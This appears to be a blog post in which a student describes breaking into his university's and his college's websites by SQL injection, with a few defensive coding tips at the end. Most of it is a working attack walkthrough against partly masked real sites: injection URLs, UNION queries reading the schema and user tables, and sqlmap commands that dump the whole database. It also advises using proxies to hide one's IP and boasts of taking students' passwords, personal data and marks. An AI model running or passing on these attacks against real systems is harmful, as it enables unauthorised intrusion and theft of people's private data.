Open in app

Sign in

Write

Sign in

How I Hacked University and My College Site

In this article, I’ll be sharing my experience of hacking university and my college site!

Shubham Sangle (mr.silent)
GDSC DYPCOE

--

Hey Guys, I hope you all enjoying quarantine.

“ As hacking is buzz word for any IT student and many people really love to be part of this trend. I am also one of them. So I Hacked something…. ”

If any of you thinking which university I am talking about let me clear it. It’s our own SPPU.

Savitri Bai Savitribai Phule Pune University

When I was submitting my university exam form I experienced that this site is not really good at security. If any of you noticed, session management is really poor. As every IT student do, they want to take a look at its source code so I also did that. What I come to know is there’s a site attached to main “SPPU” site which is still using PHP with GET parameters.

https://****.unipune.ac.in/courses-detail.php?id=1

Just take a look at that id=1 how happy he is 😊, but all problem start with that single parameter.

We can exploit database of websites using SQLInjection which is well know vulnerability in WebApp Penetration Testing.

Basic Example

Let's consider this id = 1 parameter is passed to SQL server without any sanitation. Where is no sanitation there is Corona (HACK) 😅

The query will look like this on the server-side:

select * from course_detail where id=1

what if I change id = 1 To id = 1 or 1=1

https://****.unipune.ac.in/courses-detail.php?id = 1 or 1=1

It looks confusing right…?? But its more inserting on the database side.

The query will look like this on the server-side:

select * from course_detail where id = 1 or 1=1

Now your database tries to execute this query. If you are clever enough, you can guess that 1 = 1 is universally True. So our query becomes true and returns all records in our database.

Interesting Example

What if I do this,

https://****.unipune.ac.in/courses-detail.php?id = -1 OR UNION SELECT table_schema, table_name, 1 FROM information_schema.table

union: is used to concatenate multiple queries together.

table_schema, table_name: Retrieve table schema from information_schema.

information_schema: Table where the schema is stored.

What basically above query will do is, it will retrieve all table names from the database schema. Now we can use that table name to form our attack query “select * from <table_name>” to retrieve table data.

To retrieve records from USER table we can form query as

https://****.unipune.ac.in/courses-detail.php?id = 1 OR UNION SELECT * FROM USERS

Here we get some juicy info. We just retrieved all users data form university SQL Server.

Tooling UP

We can do this type of attacks using Android and Linux. I am using DroidSQLi On Android.

Android Tool: DroidSQLi

Linux Tool: SQLMap

Copy the link from browser and paste it in “DroidSQLi” and just click on Inject and it starts attacking SQL Database. This type of attacks really make noise in database logs and your IP address is also stored in that logs. So just to be on safer side use proxies when you are attacking something that doesn’t belong to you.

Pro Tip : Guy’s Why PHP ….? There are lots of Frameworks you can use, like Django(Personal Favorite), Laravel and etc. Which provide really good security mechanisms than PHP.

What happened next, I mailed them vulnerability but they even not interested to take a look at it. So just to make them realize what I can do I send them their admin username and password by mail.

In the next 10 min, I got reply… “Can we meet ?”

And on the next movement, I was the happiest person on earth cause, they called me to fix their servers and this is how my journey started.

How I hacked My College Site

When I was diving around my old college site, I saw that this site is also a PHP site but it’s hard to find GET parameter here. So I used our Good Old Friend “GOOGLE”. We can use Google Dorks to find PHP pages where GET parameters are present.

Google hacking

Google hacking, also named Google dorking, is a computer hacking technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites use.

Google Dork: site: “website.org” event=

It will give google results with all pages which have GET parameter for that site. But I found this one interesting.

https://www.****.org/event.php?event_id=12

Now you know what to do with this URL.

Basic Hacks

But this time let’s try with SQLMap (Linux Tool).

$ sqlmap -u https://www.****.org/event.php?event_id=39 -p event_id  --current-user
  • -u URL: URL to hack with parameter in it.
  • -p event_id: Parameter we want to hack.
  • --current-user: Retrieve the current user of the database.

Here we try to get the current user of that database just to check, can we really hack it or not. If we get any data in return then we are ready to hack further.

Towards Great Hack

How to hack everything

$ sqlmap -u https://www.****.org/event.php?event_id=39 -p event_id  --dump-all

--dump-all: It will dump everything that site’s SQL Server has.

So what I got in this attack, Just everything you can think of.

  • All students information Containing college_usernames, passwords, Contact Numbers ,Branch , email_id, DOB (So I Can Wish All Of Them)
  • Admin Passwords (Un-Encrypted)
  • Their fees databases (I can pay more fees to those students than government)
  • Hostel logins and fees databases
  • Admission Database
  • Students Internal mark database
  • Alumni Data
  • Teachers Payment Database (They really getting paid good)

As every good hacker do I mailed this vulnerability to my college. Hope they have fixed it else next year someone will get free admission and hostel. Maybe some “Teachers” get salary increment.

How to protect your code from SQL Injection?

  1. Never construct a query directly with the user’s input. Instead, use Parameterized Statements. They make sure that the inputs passed into SQL queries are treated safely.
/* SQL query vulnerable to SQL injection */
$sql = "SELECT username FROM users WHERE id = $id";

2. It’s always good the sanitize the user input. Also, proper input validation should be done for example, a name can’t be digits or a phone number can’t be alphabets. However, this can be bypassed at times.

/*Its time to rewrite code with less vulnerability*/if (is_numeric($contact) == true) { $q = "SELECT username FROM users WHERE id = :contact";$sth = $dbh->prepare($q);$sth->bindParam(’:contact’, $contact);$sth->execute();$result = $sth->fetchColumn();
}

3. Use a safe driver to interact with your SQL Database. They automatically prevent against all SQL Injection attacks. For example, SQLAlchemy for python.

Conclusion

Thank For Reading

I hope you like my article on “How I Hacked University and My College Site”. I really enjoy the way I hack, It’s more fun for me.

So what would you do if you found something like this next time?

http://www.*a*er*.org/index.php?id=1

DM Me ON Twitter or Drop Response Bellow If you have hacked any of site using any other vulnerability. I would love to hear it.

Just remember there is no place like 127.0.0.1. Stay Home, Stay safe.

So, this was my experience! Hope you all enjoyed that!

If you found this interesting then share it with everyone!

Thank you! 😃

--

--

Shubham Sangle (mr.silent)
GDSC DYPCOE

Written by Shubham Sangle (mr.silent)

16 Followers
Writer for

HACKER™ | Altruistic | Google Certified Automation Engineer.